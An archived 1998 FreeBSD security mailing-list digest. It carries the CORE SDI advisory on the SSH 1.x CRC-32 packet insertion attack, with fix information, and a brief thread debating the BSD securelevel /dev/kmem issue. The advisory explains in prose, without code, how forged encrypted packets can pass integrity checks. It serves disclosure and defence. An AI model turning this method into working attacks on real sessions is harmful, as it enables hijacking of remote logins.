unknown@netspace.org (port 41264 [128.148.157.6]) by brimstone.netspace.org with ESMTP id <80741-18386>; Thu, 11 Jun 1998 21:52:59 -0400 Approved-By: aleph1@DFW.NET Received: from takeover.core.com.ar (tsagu04-ppp36.starnet.net.ar [200.26.8.84]) by netspace.org (8.8.7/8.8.7) with ESMTP id VAA10959 for ; Thu, 11 Jun 1998 21:19:46 -0400 Received: (from iarce@localhost) by takeover.core.com.ar (8.8.5/8.8.5) id WAA05406; Thu, 11 Jun 1998 22:25:14 -0300 (ART) X-Mailer: ELM [version 2.4ME+ PL15 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Message-ID: <199806120125.WAA05406@takeover.core.com.ar> Date: Thu, 11 Jun 1998 22:25:14 -0300 Reply-To: ivan@core-sdi.com From: Ivan Arce Subject: CORE-SDI-04: SSH insertion attack X-To: firewall-wizards@nfr.net, firewalls@lists.gnac.net, ssh@clinet.fi To: BUGTRAQ@NETSPACE.ORG Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org ------------------------------------------------------------------------------- CORE SDI S.A. Buenos Aires, Argentina Security Advisory June 11th, 1998 SSH insertion attack ------------------------------------------------------------------------------- This advisory addresses a vulnerability present in the SSH software package that allows an attacker to execute arbitrary commands on the SSH server or otherwise subvert an encrypted SSH channel with arbitrary data. Problem Description ~~~~~~~~~~~~~~~~~~~~ SSH (Secure Shell) is a program that provides strong authentication and secure communications over insecure channels. Its widely used for logging in to remote computers, file transfers and tunneling of other protocols over the encrypted comunications channel. All communications are automatically and transparently encrypted. Encryption is also used for integrity checking purposes although current implementations rely on a 32 bit Cyclic Redundancy Check to perform integrity checks after the decryption of an incoming packet. Encryption is done using one of a list of supported algorithms that is exchanged between client and server. Upon conection establishment client and server perform a protocol negotiation that includes mutual authentication, selection of a cipher supported by both ends for subsequent communications and of a session key to be used with the cipher. Encryption is then turned on using the selected cipher and session key, all further communications are encrypted. Currently supported ciphers are: - Blowfish Bruce Schneier's block cipher using a 128 bit key - IDEA A 128 bit block cipher - DES The Data Encryption Standard 56-bit block cipher - Triple DES (3DES) A three-key triple-DES algorithm with an effective key lenght of 112 bits. - ARCFOUR An RC4 compatible stream cipher using a 128 bit key The use of these algorithms in CBC (Cipher Block Chaining) or CFB (Cipher Feedback 64 bits) modes with the CRC-32 integrity check allows to perform a known plaintext attack (with as few as 16 bytes of known plaintext) that permits the insertion of encrypted packets with any choosen plaintext in the client to server stream that will subvert the integrity checks on the server and decrypt to the given plaintext, thus allowing an attacker to execute arbitrary commands on the server. The attack is equally feasible on the server to client stream , although it just gives the ability to send arbitrary data the user's terminal. The implications of such an attack are probably not as severe as an attack to the server side of the connection but must be taken in consideration in the process of applying fixes. Technical details ~~~~~~~~~~~~~~~~~ After the protocol identification phase, where the server sends a plaintext string specifiying its the protocol and software versions, all communication is done encapsulating data in a packet format described as 'The Binary Packet Protocol' [1] The packet layout is as follows: 32 24 16 8 0 +----------+---------+---------+---------+ | data length (bytes) | +----------+---------+---------+---------+ | 1 to 8 bytes of padding | = = +----------+---------+---------+---------+ | type | | +----------+ + | | = data = | | +----------+---------+---------+---------+ | CRC-32 | +----------+---------+---------+---------+ Data length: Length in bytes of the given packet, not including the length field and padding Padding : 8 - (length mod 8) bytes of random data, putting random data at the beginning of the packet is an effort to make known plaintext attacks more difficult. Packet type: An 8-bit unsigned byte. Data : length - 5 data bytes CRC-32 : the four 8-bit check bytes, MSB first. The CRC is computed before any encryption Encryption is done on the padding+type+data+CRC fields, the length field is never encrypted. The encrypted portion of the packet has a length that is always a multiple of 8 bytes. Knowning certain characteristics of the cipher modes being used, i.e. CBC, with a known plaintext an attacker is able to build a custom SSH packet (i.e. a type SSH_CMSG_STDIN_DATA packet) with the padding bytes computed in a way such that the next 8-bytes of the encrypted data will decrypt to arbitrary plaintext. In this particular case, the decrypted data will correspond to the type field and 7 data bytes. After the 16 bytes (padding+type+7 data bytes) the attacker would include a variable length of data bytes specifically crafted to produce a valid CRC-32 field for the whole packet once it is decrypted. This attack and several variations using the same technique can be performed due to the usage of weak integrity check schemes, in particular CRC-32 has certain properties that allows the attacker to forge a valid CRC for her corrupted packet. However, for the attack to succeed the attacker must be able to perform an active network attack, by either intercepting the legit SSH connection at any point between the client and server and injecting a forged packet or by performing a TCP session hijack attack. Such an attack is described in [6] and for SSH the two methods of TCP desynchronization can be used. In particular the method described as "Null data desynchronization" can be carried out using packets of type SSH_CMSG_IGNORE. Note that the new revision for the SSH protocol, proposed and published as Internet Drafts [2],[3],[4] [5] makes use of cryptographycally strong message authentication codes for integrity checks that wont fail to these attacks. Its is important to mention that despise the vulnerabilities found in the SSH protocol, it still remains to be a much more secure alternative to telnet, rsh and rlogin applications. [1] "The SSH (Secure Shell) Remote Login Protocol", T. Ylonen Helsinki University of Technology. November 15th 1995 (draft expired on May 15th, 1996) Included as the file ./RFC in the ssh distribution [2] "SSH Protocol Architecture", draft-ietf-secsh-architecture-01.txt.gz T. Ylonen, T. Kivinen, M. Saarinen. SSH. November 7th, 1997 [3] "SSH Connection Protocol", draft-ietf-secsh-connect-03.txt.gz T. Ylonen, T. Kivinen, M. Saarinen. SSH. November 7th, 1997 [4] "SSH Authentication Protocol", draft-ietf-secsh-userauth-03.txt.gz T. Ylonen, T. Kivinen, M. Saarinen. SSH. November 7th, 1997 [5] "SSH Transport Layer Protocol",draft-ietf-secsh-transport-03.txt.gz T. Ylonen, T. Kivinen, M. Saarinen. SSH. November 7th, 1997 (drafts expired on May 7th, 1998) All Internet drafts are available at [6] "Simple Active Attack Against TCP", Laurent Joncheray, Merit Networks Inc., 5th USENIX Security Simposium. 1995. Impact: ~~~~~~~ An attacker with access to the encrypted SSH stream may insert encrypted blocks in the stream that will decrypt to arbitrary commands to be executed on the SSH server. Fix Information: ~~~~~~~~~~~~~~~~ Upgrade to the upcoming SSH protocol version 2. Commercial F-Secure SSH users contact Data Fellows Inc. for information on how to upgrade to F-Secure 2.0 Notice that version 2 of the SSH protocol is not compatible with the previous version, thus you will need to upgrade all the SSH clients as well. In the meantime, upgrade to version 1.2.25 of SSH, which fixes the problem. The SSH 1.2.25 distribution can be obtained from: F-Secure SSH version 1.3.5 fixes this security problem. If you are using the commercial Data Fellows SSH package and you have a support contract, you can obtain the 1.3.5 from your local retailer. Users without a support contract can obtain a patch which fixes this problem from: . A patch for the free SSH 1.2.23 distribution and the complete SSH 1.2.23 package, with the patch applied, can be obtained at: Below are the MD5 hashes for the provided files MD5 (ssh-1.2.23.patch) = 6bdb63d57f893907191986c5ced557ab MD5 (ssh-1.2.23-core.tar.Z) = fffb52122aae26c1f212c051a305a310 MD5 (ssh-1.2.23-core.tar.gz) = f9509ba0f0715637805c6b116adc0869 Vulnerable Systems: ~~~~~~~~~~~~~~~~~~ All systems running implementations of SSH using protocol version 1.x are vulnerable. This includes SSH software versions up to 1.2.23 and F-Secure SSH 1.3.4 To obtain the version of the SSH server that is running on a given host you can issue the following commands: $ telnet 22 Trying ... Connected to . Escape character is '^]'. SSH-1.5-1.2.23 \ / \--------- software version |------------ protocol version ^] telnet> close Connection closed. $ exit Additional Information: ~~~~~~~~~~~~~~~~~~~~~~~ These vulnerabilities were discovered by Ariel Futoransky and Emiliano Kargieman CORE SDI wishes to thank the SSH maintainers Tatu Ylonen and Tero Kivinen for their quick response to the issues rised by this advisory. Olli Voima of Data Fellows Inc. provided the fix information for the F-Secure products. Comments and questions regarding this advisory should be sent to: Ariel Futoransky Emiliano Kargieman For more information about CORE SDI S.A. contact or visit You can contact CORE SDI S.A. at using the the following PGP key: Type Bits/KeyID Date User ID pub 1024/CF4E0CF5 1998/05/18 CORELABS -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.3ia Comment: Requires PGP version 2.6 or later. mQCNAzVgfMgAAAEEAJSfJNdvCwIAc4AK0ckeimubLIwzsRVDRhjPQIOYt/7kxxio DZybr53fwMEjyT8cHXRL08i0R9rcuFeCNAez6XcalbhqUKXDcLL/cZK80CCDSCs5 tRCZGGOEBnXQIoyvbvi4gNYhBS5wUvmh3b/mvRFTvhmRrUy9m/nO/LnPTgz1AAUR tCBDT1JFTEFCUyA8Y29yZWxhYnNAY29yZS1zZGkuY29tPokAlQMFEDVgfMn5zvy5 z04M9QEBC6ED/0Szt3f54JTvkZG3ezQ8G60HvAw4/A5Ti6i3oze6jsXxzGp6pA1x i0jaZpKaUSpo0MLc7BcijMKneuUHnN3XtN5YxtFt0aEoot1MIvv4BsdeUb3x257G 3+vr8SxGk44Vm4tfuN8F/2dNo/00yYP9rd3zQ8Tl+gmr5VxnLViZIDuh =ulRg -----END PGP PUBLIC KEY BLOCK----- Copyright Notice: ~~~~~~~~~~~~~~~~~ The contents of this advisory are Copyright (C) 1998 CORE SDI S.A., and may be distributed freely provided that no fee is charged for this distribution, and proper credit is given. $Id: ssh-advisory.txt,v 1.8 1998/06/11 22:05:03 iarce Exp $ -- ==============================[ CORE Seguridad de la Informacion S.A. ]======= Ivan Arce Gerencia de Tecnologia Email : ivan@core-sdi.com Av. Santa Fe 2861 5to C TE : +54-1-821-1030 CP 1425 FAX : +54-1-821-1030 Buenos Aires, Argentina Mensajeria: +54-1-317-4157 ============================================================================== To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Fri Jun 12 18:47:43 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id SAA07370 for freebsd-security-outgoing; Fri, 12 Jun 1998 18:47:43 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from room101.sysc.com (qmailr@room101.sysc.com [209.100.148.49]) by hub.freebsd.org (8.8.8/8.8.8) with SMTP id SAA07365 for ; Fri, 12 Jun 1998 18:47:38 -0700 (PDT) (envelope-from jayrich@room101.sysc.com) Received: (qmail 755 invoked by uid 1000); 13 Jun 1998 01:47:20 -0000 Date: Fri, 12 Jun 1998 20:47:20 -0500 (EST) From: Jay Richmond To: security@FreeBSD.ORG Subject: bsd securelevel patch question Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Hello, Just wondering if we should expect an official patch for the securelevel problem that's affecting all the BSD's, or if the one provided in the recent exploit is being recommended? Thanks, Jay To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Fri Jun 12 20:57:49 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id UAA21328 for freebsd-security-outgoing; Fri, 12 Jun 1998 20:57:49 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from burka.rdy.com (dima@burka.rdy.com [205.149.163.30]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id UAA21306 for ; Fri, 12 Jun 1998 20:57:12 -0700 (PDT) (envelope-from dima@burka.rdy.com) Received: (from dima@localhost) by burka.rdy.com (8.8.8/RDY&DVV) id UAA06923; Fri, 12 Jun 1998 20:57:10 -0700 (PDT) Message-Id: <199806130357.UAA06923@burka.rdy.com> Subject: Re: bsd securelevel patch question In-Reply-To: from Jay Richmond at "Jun 12, 98 08:47:20 pm" To: jayrich@room101.sysc.com (Jay Richmond) Date: Fri, 12 Jun 1998 20:57:10 -0700 (PDT) Cc: security@FreeBSD.ORG X-Class: Fast Organization: HackerDome Reply-To: dima@best.net From: dima@best.net (Dima Ruban) X-Mailer: ELM [version 2.4ME+ PL40 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Jay Richmond writes: > Hello, > > Just wondering if we should expect an official patch for the securelevel > problem that's affecting all the BSD's, or if the one provided in the > recent exploit is being recommended? According to Thomas Ptacek, this is not exactly a bug, and after thinking some more about it, I kinda agree with him. (Feature, not a bug) > > Thanks, > Jay > > > To Unsubscribe: send mail to majordomo@FreeBSD.org > with "unsubscribe security" in the body of the message > -- dima To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Sat Jun 13 05:19:38 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id FAA11187 for freebsd-security-outgoing; Sat, 13 Jun 1998 05:19:38 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from cheops.anu.edu.au (avalon@cheops.anu.edu.au [150.203.76.24]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id FAA11181 for ; Sat, 13 Jun 1998 05:19:33 -0700 (PDT) (envelope-from avalon@coombs.anu.edu.au) Message-Id: <199806131219.FAA11181@hub.freebsd.org> Received: by cheops.anu.edu.au (1.37.109.16/16.2) id AA076260349; Sat, 13 Jun 1998 22:19:09 +1000 From: Darren Reed Subject: Re: bsd securelevel patch question To: dima@best.net Date: Sat, 13 Jun 1998 22:19:09 +1000 (EST) Cc: jayrich@room101.sysc.com, security@FreeBSD.ORG In-Reply-To: <199806130357.UAA06923@burka.rdy.com> from "Dima Ruban" at Jun 12, 98 08:57:10 pm X-Mailer: ELM [version 2.4 PL23] Content-Type: text Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org In some mail from Dima Ruban, sie said: > > Jay Richmond writes: > > Hello, > > > > Just wondering if we should expect an official patch for the securelevel > > problem that's affecting all the BSD's, or if the one provided in the > > recent exploit is being recommended? > > According to Thomas Ptacek, this is not exactly a bug, and after thinking some > more about it, I kinda agree with him. (Feature, not a bug) Given it is exploitable, whether or not it is a feature, is irrelevant. It permits the protection intended by securelevel over /dev/kmem to be bypassed, reducing the overall security of the system. Darren To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message From owner-freebsd-security Sat Jun 13 23:03:53 1998 Return-Path: Received: (from majordom@localhost) by hub.freebsd.org (8.8.8/8.8.8) id XAA24934 for freebsd-security-outgoing; Sat, 13 Jun 1998 23:03:53 -0700 (PDT) (envelope-from owner-freebsd-security@FreeBSD.ORG) Received: from burka.rdy.com (dima@burka.rdy.com [205.149.163.30]) by hub.freebsd.org (8.8.8/8.8.8) with ESMTP id XAA24927 for ; Sat, 13 Jun 1998 23:03:44 -0700 (PDT) (envelope-from dima@burka.rdy.com) Received: (from dima@localhost) by burka.rdy.com (8.8.8/RDY&DVV) id XAA25570; Sat, 13 Jun 1998 23:03:31 -0700 (PDT) Message-Id: <199806140603.XAA25570@burka.rdy.com> Subject: Re: bsd securelevel patch question In-Reply-To: <199806131219.FAA15482@flea.best.net> from Darren Reed at "Jun 13, 98 10:19:09 pm" To: avalon@coombs.anu.edu.au (Darren Reed) Date: Sat, 13 Jun 1998 23:03:30 -0700 (PDT) Cc: dima@best.net, jayrich@room101.sysc.com, security@FreeBSD.ORG X-Class: Fast Organization: HackerDome Reply-To: dima@best.net From: dima@best.net (Dima Ruban) X-Mailer: ELM [version 2.4ME+ PL40 (25)] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: owner-freebsd-security@FreeBSD.ORG Precedence: bulk X-Loop: FreeBSD.org Darren Reed writes: > In some mail from Dima Ruban, sie said: > > > > Jay Richmond writes: > > > Hello, > > > > > > Just wondering if we should expect an official patch for the securelevel > > > problem that's affecting all the BSD's, or if the one provided in the > > > recent exploit is being recommended? > > > > According to Thomas Ptacek, this is not exactly a bug, and after thinking some > > more about it, I kinda agree with him. (Feature, not a bug) > > Given it is exploitable, whether or not it is a feature, is irrelevant. > It permits the protection intended by securelevel over /dev/kmem to be > bypassed, reducing the overall security of the system. Hmm, this is not exactly bypassing a protection, you know. Mainly because this protection is simply not targeted for this. 1 Secure mode - the system immutable and system append-only flags may not be turned off; disks for mounted filesystems, /dev/mem, and /dev/kmem may not be opened for writing. (this is from man init) I don't see exactly how it violates anything. > > Darren > -- dima To Unsubscribe: send mail to majordomo@FreeBSD.org with "unsubscribe security" in the body of the message